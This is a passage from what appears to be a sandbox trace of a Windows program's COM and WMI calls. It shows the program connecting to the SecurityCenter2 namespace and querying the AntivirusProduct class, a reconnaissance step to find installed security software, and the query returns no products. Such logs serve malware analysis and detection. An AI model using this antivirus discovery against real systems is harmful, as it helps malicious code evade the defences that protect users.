[7]=0x46)), ppvObject=0x38e358 | out: ppvObject=0x38e358*=0x0) returned 0x80004002 [0235.479] CoGetContextToken (in: pToken=0x38e3b8 | out: pToken=0x38e3b8) returned 0x0 [0235.479] CoGetContextToken (in: pToken=0x38e7cc | out: pToken=0x38e7cc) returned 0x0 [0235.479] WbemLocator:IUnknown:QueryInterface (in: This=0x56429d0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e84c | out: ppvObject=0x38e84c*=0x0) returned 0x80004002 [0235.479] WbemLocator:IUnknown:Release (This=0x56429d0) returned 0x2 [0235.480] WbemLocator:IUnknown:Release (This=0x56429d0) returned 0x1 [0235.480] CoGetContextToken (in: pToken=0x38ee4c | out: pToken=0x38ee4c) returned 0x0 [0235.480] CoGetContextToken (in: pToken=0x38edac | out: pToken=0x38edac) returned 0x0 [0235.480] WbemLocator:IUnknown:QueryInterface (in: This=0x56429d0, riid=0x38ee7c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee78 | out: ppvObject=0x38ee78*=0x56429d0) returned 0x0 [0235.480] WbemLocator:IUnknown:AddRef (This=0x56429d0) returned 0x3 [0235.480] WbemLocator:IUnknown:Release (This=0x56429d0) returned 0x2 [0235.480] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x56444c8, puCount=0x38f008 | out: puCount=0x38f008*=0x2) returned 0x0 [0235.480] WbemDefPath:IWbemPath:GetText (in: This=0x56444c8, lFlags=8, puBuffLength=0x38f004*=0x0, pszText=0x0 | out: puBuffLength=0x38f004*=0x19, pszText=0x0) returned 0x0 [0235.480] WbemDefPath:IWbemPath:GetText (in: This=0x56444c8, lFlags=8, puBuffLength=0x38f004*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f004*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0235.480] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38eea0 | out: ppv=0x38eea0*=0x56429b0) returned 0x0 [0235.480] WbemLocator:IWbemLocator:ConnectServer (in: This=0x56429b0, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef54 | out: ppNamespace=0x38ef54*=0x563fb38) returned 0x0 [0235.622] WbemLocator:IUnknown:QueryInterface (in: This=0x563fb38, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edc4 | out: ppvObject=0x38edc4*=0x55c552c) returned 0x0 [0235.622] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c552c, pProxy=0x563fb38, pAuthnSvc=0x38ee14, pAuthzSvc=0x38ee10, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c, pImpLevel=0x38edfc, pAuthInfo=0x38ee00, pCapabilites=0x38ee04 | out: pAuthnSvc=0x38ee14*=0xa, pAuthzSvc=0x38ee10*=0x0, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c*=0x6, pImpLevel=0x38edfc*=0x2, pAuthInfo=0x38ee00, pCapabilites=0x38ee04*=0x1) returned 0x0 [0235.622] WbemLocator:IUnknown:Release (This=0x55c552c) returned 0x1 [0235.622] WbemLocator:IUnknown:QueryInterface (in: This=0x563fb38, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edb8 | out: ppvObject=0x38edb8*=0x55c554c) returned 0x0 [0235.623] WbemLocator:IUnknown:QueryInterface (in: This=0x563fb38, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda4 | out: ppvObject=0x38eda4*=0x55c552c) returned 0x0 [0235.623] WbemLocator:IClientSecurity:SetBlanket (This=0x55c552c, pProxy=0x563fb38, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.623] WbemLocator:IUnknown:Release (This=0x55c552c) returned 0x2 [0235.623] WbemLocator:IUnknown:Release (This=0x55c554c) returned 0x1 [0235.623] CoTaskMemFree (pv=0x55fed68) [0235.623] WbemLocator:IUnknown:AddRef (This=0x563fb38) returned 0x2 [0235.623] WbemLocator:IUnknown:Release (This=0x56429b0) returned 0x0 [0235.623] CoGetContextToken (in: pToken=0x38e2f8 | out: pToken=0x38e2f8) returned 0x0 [0235.624] CoGetContextToken (in: pToken=0x38e70c | out: pToken=0x38e70c) returned 0x0 [0235.624] WbemLocator:IUnknown:QueryInterface (in: This=0x563fb38, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6a4 | out: ppvObject=0x38e6a4*=0x55c5534) returned 0x0 [0235.624] WbemLocator:IRpcOptions:Query (in: This=0x55c5534, pPrx=0x563ac80, dwProperty=2, pdwValue=0x38e798 | out: pdwValue=0x38e798) returned 0x80004002 [0235.624] WbemLocator:IUnknown:Release (This=0x55c5534) returned 0x2 [0235.624] CoGetContextToken (in: pToken=0x38ecdc | out: pToken=0x38ecdc) returned 0x0 [0235.624] CoGetContextToken (in: pToken=0x38ec3c | out: pToken=0x38ec3c) returned 0x0 [0235.624] WbemLocator:IUnknown:QueryInterface (in: This=0x563fb38, riid=0x38ed0c*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ebd8 | out: ppvObject=0x38ebd8*=0x563fb38) returned 0x0 [0235.624] WbemLocator:IUnknown:Release (This=0x563fb38) returned 0x2 [0235.624] SysStringLen (param_1=0x0) returned 0x0 [0235.624] CoGetContextToken (in: pToken=0x38ee0c | out: pToken=0x38ee0c) returned 0x0 [0235.624] IWbemServices:ExecQuery (in: This=0x563fb38, strQueryLanguage="WQL", strQuery="SELECT * FROM AntivirusProduct", lFlags=16, pCtx=0x0, ppEnum=0x38f014 | out: ppEnum=0x38f014*=0x544efd0) returned 0x0 [0235.627] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee70 | out: ppvObject=0x38ee70*=0x544efd4) returned 0x0 [0235.627] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38eec0, pAuthzSvc=0x38eebc, pServerPrincName=0x38eeb4, pAuthnLevel=0x38eeb8, pImpLevel=0x38eea8, pAuthInfo=0x38eeac, pCapabilites=0x38eeb0 | out: pAuthnSvc=0x38eec0*=0xa, pAuthzSvc=0x38eebc*=0x0, pServerPrincName=0x38eeb4, pAuthnLevel=0x38eeb8*=0x6, pImpLevel=0x38eea8*=0x2, pAuthInfo=0x38eeac, pCapabilites=0x38eeb0*=0x1) returned 0x0 [0235.627] IUnknown:Release (This=0x544efd4) returned 0x1 [0235.627] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee64 | out: ppvObject=0x38ee64*=0x55c4bec) returned 0x0 [0235.628] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee50 | out: ppvObject=0x38ee50*=0x544efd4) returned 0x0 [0235.628] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.629] IUnknown:Release (This=0x544efd4) returned 0x2 [0235.629] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0235.629] CoTaskMemFree (pv=0x55fecd8) [0235.629] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0235.630] CoGetContextToken (in: pToken=0x38e390 | out: pToken=0x38e390) returned 0x0 [0235.630] CoGetContextToken (in: pToken=0x38e7a4 | out: pToken=0x38e7a4) returned 0x0 [0235.630] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e73c | out: ppvObject=0x38e73c*=0x55c4bd4) returned 0x0 [0235.630] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x563acc8, dwProperty=2, pdwValue=0x38e830 | out: pdwValue=0x38e830) returned 0x80004002 [0235.630] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0235.630] CoGetContextToken (in: pToken=0x38ed74 | out: pToken=0x38ed74) returned 0x0 [0235.630] CoGetContextToken (in: pToken=0x38ecd4 | out: pToken=0x38ecd4) returned 0x0 [0235.630] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38eda4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec70 | out: ppvObject=0x38ec70*=0x544efd0) returned 0x0 [0235.630] IUnknown:Release (This=0x544efd0) returned 0x2 [0235.630] SysStringLen (param_1=0x0) returned 0x0 [0235.631] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x56444c8, puCount=0x38f060 | out: puCount=0x38f060*=0x2) returned 0x0 [0235.631] WbemDefPath:IWbemPath:GetText (in: This=0x56444c8, lFlags=4, puBuffLength=0x38f05c*=0x0, pszText=0x0 | out: puBuffLength=0x38f05c*=0x19, pszText=0x0) returned 0x0 [0235.631] WbemDefPath:IWbemPath:GetText (in: This=0x56444c8, lFlags=4, puBuffLength=0x38f05c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f05c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0235.631] CoGetContextToken (in: pToken=0x38eeb4 | out: pToken=0x38eeb4) returned 0x0 [0235.631] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f06c | out: ppEnum=0x38f06c*=0x544f098) returned 0x0 [0235.632] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef28 | out: ppvObject=0x38ef28*=0x544f09c) returned 0x0 [0235.632] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef78, pAuthzSvc=0x38ef74, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70, pImpLevel=0x38ef60, pAuthInfo=0x38ef64, pCapabilites=0x38ef68 | out: pAuthnSvc=0x38ef78*=0xa, pAuthzSvc=0x38ef74*=0x0, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70*=0x6, pImpLevel=0x38ef60*=0x2, pAuthInfo=0x38ef64, pCapabilites=0x38ef68*=0x1) returned 0x0 [0235.632] IUnknown:Release (This=0x544f09c) returned 0x1 [0235.632] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef1c | out: ppvObject=0x38ef1c*=0x55c572c) returned 0x0 [0235.632] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef08 | out: ppvObject=0x38ef08*=0x544f09c) returned 0x0 [0235.632] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.634] IUnknown:Release (This=0x544f09c) returned 0x2 [0235.634] WbemLocator:IUnknown:Release (This=0x55c572c) returned 0x1 [0235.634] CoTaskMemFree (pv=0x55fed98) [0235.634] IUnknown:AddRef (This=0x544f098) returned 0x2 [0235.634] CoGetContextToken (in: pToken=0x38e438 | out: pToken=0x38e438) returned 0x0 [0235.634] CoGetContextToken (in: pToken=0x38e84c | out: pToken=0x38e84c) returned 0x0 [0235.634] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7e4 | out: ppvObject=0x38e7e4*=0x55c5714) returned 0x0 [0235.635] WbemLocator:IRpcOptions:Query (in: This=0x55c5714, pPrx=0x563ad58, dwProperty=2, pdwValue=0x38e8d8 | out: pdwValue=0x38e8d8) returned 0x80004002 [0235.635] WbemLocator:IUnknown:Release (This=0x55c5714) returned 0x2 [0235.635] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0235.635] CoGetContextToken (in: pToken=0x38ed7c | out: pToken=0x38ed7c) returned 0x0 [0235.635] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee4c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ed18 | out: ppvObject=0x38ed18*=0x544f098) returned 0x0 [0235.635] IUnknown:Release (This=0x544f098) returned 0x2 [0235.635] SysStringLen (param_1=0x0) returned 0x0 [0235.635] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0235.636] CoTaskMemAlloc (cb=0x4) returned 0x5642a40 [0235.636] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642a40, puReturned=0x266db08 | out: apObjects=0x5642a40*=0x0, puReturned=0x266db08*=0x0) returned 0x1 [0235.637] CoTaskMemFree (pv=0x5642a40) [0235.637] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0235.637] IUnknown:Release (This=0x544f098) returned 0x1 [0235.637] IUnknown:Release (This=0x544f098) returned 0x0 [0235.638] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0235.638] IUnknown:Release (This=0x544efd0) returned 0x1 [0235.638] IUnknown:Release (This=0x544efd0) returned 0x0 [0235.639] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f088 | out: ppv=0x38f088*=0x6d0cac) returned 0x0 [0235.639] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f080 | out: pAptType=0x38f080*=1) returned 0x0 [0235.639] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f084 | out: ppvObject=0x38f084*=0x0) returned 0x80004002 [0235.639] IUnknown:Release (This=0x6d0cac) returned 0x1 [0235.639] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9f0 | out: ppv=0x38e9f0*=0x5642a40) returned 0x0 [0235.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5642a40, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ec08 | out: ppvObject=0x38ec08*=0x0) returned 0x80004002 [0235.640] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5642a40, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ec14 | out: ppvObject=0x38ec14*=0x5644538) returned 0x0 [0235.640] WbemDefPath:IUnknown:Release (This=0x5642a40) returned 0x0 [0235.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644538, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e834 | out: ppvObject=0x38e834*=0x5644538) returned 0x0 [0235.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644538, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7e8 | out: ppvObject=0x38e7e8*=0x0) returned 0x80004002 [0235.640] WbemDefPath:IUnknown:AddRef (This=0x5644538) returned 0x3 [0235.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644538, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e144 | out: ppvObject=0x38e144*=0x0) returned 0x80004002 [0235.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644538, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0f4 | out: ppvObject=0x38e0f4*=0x0) returned 0x80004002 [0235.640] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644538, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e100 | out: ppvObject=0x38e100*=0x5642a00) returned 0x0 [0235.640] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5642a00, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e108 | out: pCid=0x38e108*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0235.640] WbemDefPath:IUnknown:Release (This=0x5642a00) returned 0x3 [0235.641] CoGetContextToken (in: pToken=0x38e160 | out: pToken=0x38e160) returned 0x0 [0235.641] CoGetContextToken (in: pToken=0x38e574 | out: pToken=0x38e574) returned 0x0 [0235.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644538, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5f4 | out: ppvObject=0x38e5f4*=0x0) returned 0x80004002 [0235.641] WbemDefPath:IUnknown:Release (This=0x5644538) returned 0x2 [0235.641] WbemDefPath:IUnknown:Release (This=0x5644538) returned 0x1 [0235.641] CoGetContextToken (in: pToken=0x38ef0c | out: pToken=0x38ef0c) returned 0x0 [0235.641] CoGetContextToken (in: pToken=0x38ee6c | out: pToken=0x38ee6c) returned 0x0 [0235.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644538, riid=0x38ef3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef38 | out: ppvObject=0x38ef38*=0x5644538) returned 0x0 [0235.641] WbemDefPath:IUnknown:AddRef (This=0x5644538) returned 0x3 [0235.641] WbemDefPath:IUnknown:Release (This=0x5644538) returned 0x2 [0235.641] WbemDefPath:IWbemPath:SetText (This=0x5644538, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0235.641] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644538, puCount=0x38f0b0 | out: puCount=0x38f0b0*=0x2) returned 0x0 [0235.641] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f0ac*=0x0, pszText=0x0 | out: puBuffLength=0x38f0ac*=0x19, pszText=0x0) returned 0x0 [0235.641] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f0ac*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f0ac*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0235.641] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644538, puCount=0x38f09c | out: puCount=0x38f09c*=0x2) returned 0x0 [0235.641] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f098*=0x0, pszText=0x0 | out: puBuffLength=0x38f098*=0x19, pszText=0x0) returned 0x0 [0235.641] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f098*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f098*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0235.641] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f02c | out: ppv=0x38f02c*=0x6d0cac) returned 0x0 [0235.641] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f024 | out: pAptType=0x38f024*=1) returned 0x0 [0235.641] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f028 | out: ppvObject=0x38f028*=0x0) returned 0x80004002 [0235.641] IUnknown:Release (This=0x6d0cac) returned 0x1 [0235.642] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec48 | out: ppv=0x38ec48*=0x563ad70) returned 0x0 [0235.642] WbemLocator:IUnknown:QueryInterface (in: This=0x563ad70, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee60 | out: ppvObject=0x38ee60*=0x0) returned 0x80004002 [0235.642] WbemLocator:IClassFactory:CreateInstance (in: This=0x563ad70, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee6c | out: ppvObject=0x38ee6c*=0x5642a30) returned 0x0 [0235.642] WbemLocator:IUnknown:Release (This=0x563ad70) returned 0x0 [0235.642] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a30, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea8c | out: ppvObject=0x38ea8c*=0x5642a30) returned 0x0 [0235.642] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a30, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea40 | out: ppvObject=0x38ea40*=0x0) returned 0x80004002 [0235.643] WbemLocator:IUnknown:AddRef (This=0x5642a30) returned 0x3 [0235.643] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a30, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e39c | out: ppvObject=0x38e39c*=0x0) returned 0x80004002 [0235.643] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a30, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e34c | out: ppvObject=0x38e34c*=0x0) returned 0x80004002 [0235.643] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a30, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e358 | out: ppvObject=0x38e358*=0x0) returned 0x80004002 [0235.643] CoGetContextToken (in: pToken=0x38e3b8 | out: pToken=0x38e3b8) returned 0x0 [0235.643] CoGetContextToken (in: pToken=0x38e7cc | out: pToken=0x38e7cc) returned 0x0 [0235.643] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a30, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e84c | out: ppvObject=0x38e84c*=0x0) returned 0x80004002 [0235.643] WbemLocator:IUnknown:Release (This=0x5642a30) returned 0x2 [0235.643] WbemLocator:IUnknown:Release (This=0x5642a30) returned 0x1 [0235.643] 